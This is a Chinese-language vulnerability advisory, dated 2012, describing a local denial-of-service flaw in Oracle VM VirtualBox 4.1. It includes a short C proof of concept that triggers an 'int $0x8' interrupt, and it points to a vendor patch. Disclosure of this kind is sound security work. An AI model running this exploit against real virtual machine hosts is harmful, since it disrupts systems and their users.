发布日期:2012-09-08
更新日期:2012-09-12
受影响系统:
Oracle VM VirtualBox 4.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 55471
VirtualBox是一种x86的虚拟化产品。
Oracle VM VirtualBox存在本地拒绝服务漏洞,攻击者可利用此漏洞造成拒绝服务。
<*来源:halfdog
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2012 halfdog <me (%) halfdog.net>
*
* Compile: gcc -o RtcInt RtcInt.c
* Usage: ./RtcInt
*/
int main(int argc, char **argv) {
asm (
"int $0x8;"
: // output: none
: // input: none
:"%eax", "%ebx", "%ecx", "%edx" // clobbered register
);
return(0);
}
建议:
--------------------------------------------------------------------------------
厂商补丁:
Oracle
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: